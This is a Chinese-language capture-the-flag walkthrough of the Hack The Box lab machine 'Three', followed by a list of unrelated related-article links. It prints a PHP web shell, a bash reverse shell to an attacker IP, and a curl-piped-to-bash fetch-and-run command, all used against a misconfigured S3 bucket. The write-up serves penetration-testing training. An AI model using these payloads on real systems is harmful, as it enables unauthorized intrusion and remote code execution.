环境给了一个IP,nmap信息搜集一波

nmap -sS -sV 10.129.126.35
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
80/tcp open  httpApache httpd 2.4.29 ((Ubuntu))

访问10.129.126.35:80,收集有用信息(渗透测试==信息收集)

Phone: +01 343 123 6102
Email: mail@thetoppers.htb

thetoppers.htb应该是域名,把域名和IP加到hosts文件中,tee命令的作用就是读取标准输入内容,将读取到的内容数据写入到标准输出和文件中。

echo "10.129.126.35 thetoppers.htb" | tee -a /etc/hosts

再次访问和之前页面一样,尝试子域名爆破,有没有其他突破口

gobuster vhost -w /usr/share/wordlists/dict/subnames.txt -u http://thetoppers.htb

爆破的很久最终爆破结果有s3.thetoppers.htb,加hosts

echo "10.129.126.35 s3.thetoppers.htb" | tee -a /etc/hosts

页面只有一条json信息。看看s3,s3是亚马逊云存储的简单存储服务,全程是Simple Storage Service。

{"status": "running"}

我们就可以通过awscli来与s3进行交互,安装并将所有字段随意配置(服务器可能不校验)。

aws configure

列出所有s3的桶

aws --endpoint=http://s3.thetoppers.htb s3 ls

列出该s3下的目录及对象

aws --endpoint=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb

创建一句话shell

echo'<?php system($_GET["cmd"]); ?>' > shell.php

使用cp命令拷贝到s3的桶里

aws --endpoint=http://s3.thetoppers.htb s3 cp shell.php s3://thetoppers.htb

访问http://thetoppers.htb/shell.php?cmd=ls可以看到thetoppers.htb桶里的目录及对象

images index.php shell.php

我们通过命令执行shell,curl执行bash脚本反弹shell来实现命令行交互。查看本机ip
ifconfig //10.10.16.60
生成bash一句话shell.sh

#!/bin/bash
bash-i >& /dev/tcp/10.10.16.60/1337 0>&1

nc监听端口

nc -nvlp 1337

python创建简易服务器

python3 -m http.server 8090

目标机curl本机bash文件并执行

http://thetoppers.htb/shell.php?cmd=curl%2010.10.16.60:8090/shell.sh%20|%20bash

如果成功的话可以看到我们监听的页面,如果没反弹成功可以看看10.10.16.60:8090是否有我们的shell.sh文件

www目录catflag即可。

Hack The Box - Three(新手友好)相关推荐

  1. PyTorch官方教程大更新:增加标签索引,更加新手友好

    点击上方↑↑↑"视学算法"关注我 来源:公众号 量子位 授权 PyTorch官方教程,现已大幅更新: 提供标签索引,增加主题分类,更加新手友好. 不必再面对一整页教学文章茫然无措, ...

  2. C++ 的语言杂谈(一)--C++不是新手友好的

    C++的语言品味是独特的,喜欢的人特别喜欢,讨厌的人特别讨厌.虽然Bjane Stroustrup不断地宣称C++的发展方向是新手友好的,但实际上对新手来说,最重要的还是有强大方便的标准库可以使用(像 ...

  3. 【Hack The Box】linux练习-- SneakyMailer

    HTB 学习笔记 [Hack The Box]linux练习-- SneakyMailer

  4. Hack The Box - Access Writeup

    第一次尝试Hack The Box,在难度较低的Access上,前后花了有两天的时间,汗.收获还是很大,在此记录一下,以便后阅. 首先是获取user,通过nmap扫描,可以发现目标主机开了三个端口21 ...

  5. Hack The Box - Meta 利用Exiftool远程代码执行漏洞获取webshell,ImageMagrick命令执行漏洞横向提权,更改环境配置SUDO纵向提权

    Hack The Box - Meta Hack The Box开始使用流程看这篇 文章目录 Hack The Box - Meta 整体思路 1.Nmap扫描 2.Exiftool远程代码执行漏洞( ...

  6. 【Hack The Box】linux练习-- Blunder

    HTB 学习笔记 [Hack The Box]linux练习-- Blunder

  7. Hack The Box - Catch 利用let chat API查询信息,Cachet配置泄露漏洞获取ssh登录密码,apk代码注入漏洞利用获取root权限

    Hack The Box-Catch Hack The Box开始使用流程看这篇 文章目录 Hack The Box-Catch 整体思路 1.Nmap扫描 2.apk文件信息收集 3.lets ch ...

  8. 【Hack The Box】windows练习-- Silo

    HTB 学习笔记 [Hack The Box]windows练习-- Silo

  9. 【Hack The Box】linux练习-- Ophiuchi

    HTB 学习笔记 [Hack The Box]linux练习-- Ophiuchi

最新文章

  1. BZOJ1393 [Ceoi2008]knights
  2. VIM配置(不用这么麻烦了,文章尾部附带他人写得脚本安装)
  3. 如何安装 SAP Commerce Cloud,以便让 SAP Spartacus 使用
  4. vue 关闭弹如何销毁子组件_vue中的eventBus会产生内存泄漏吗
  5. Archlive新年第一棒: 基于2.6.37稳定内核的archlive20110107
  6. sqlplus登录缓慢的问题分析过程及解决小记
  7. idea下载github代码及切换分支
  8. 数学之路-数据分析进阶-转化率
  9. 计算机程序员 面试题库,计算机软考程序员面试题精选题2
  10. 算法分析与设计-实验一 递归与分治算法设计
  11. Python从ftp服务器下载文件的源码
  12. 用计算机和电视机组成家庭影院,家庭影院怎么连接电脑_家庭影院连接电脑详解【图文】-太平洋IT百科...
  13. Error: Canceled future for execute_request message before replies were done
  14. 重复率30%可以通过论文查重吗?
  15. ucharts 柱状图圆角_圆角柱状图
  16. 洛谷B2058 奥运奖牌计数
  17. 2021-2022学年广州市育才实验学校九年级第一学期期中考试英语试题
  18. 通过Kali Linux暴力破解WiFi密码
  19. TCP/UDP 端口
  20. Mac OS X的Spotlight综述

热门文章

  1. AngularCI/CD:Error: initial exceeded maximum budget
  2. 牛叔说电影-圣堂四骑士
  3. python 编码 乱码问题
  4. 无监督聚类算法该如何评价
  5. 关于ViewGroup和View的事件分发
  6. 网络流最大流----EK算法
  7. 基于JAVA3D的网络三维技术的设计与实现
  8. 【历史上的今天】3 月 28 日:EPROM 的发明者出生;计算机进入艾滋病研究领域
  9. SAR ADC系列11:分段式CDAC
  10. Vuepress2版本打包报错:TypeError: Invalid value used as weak map key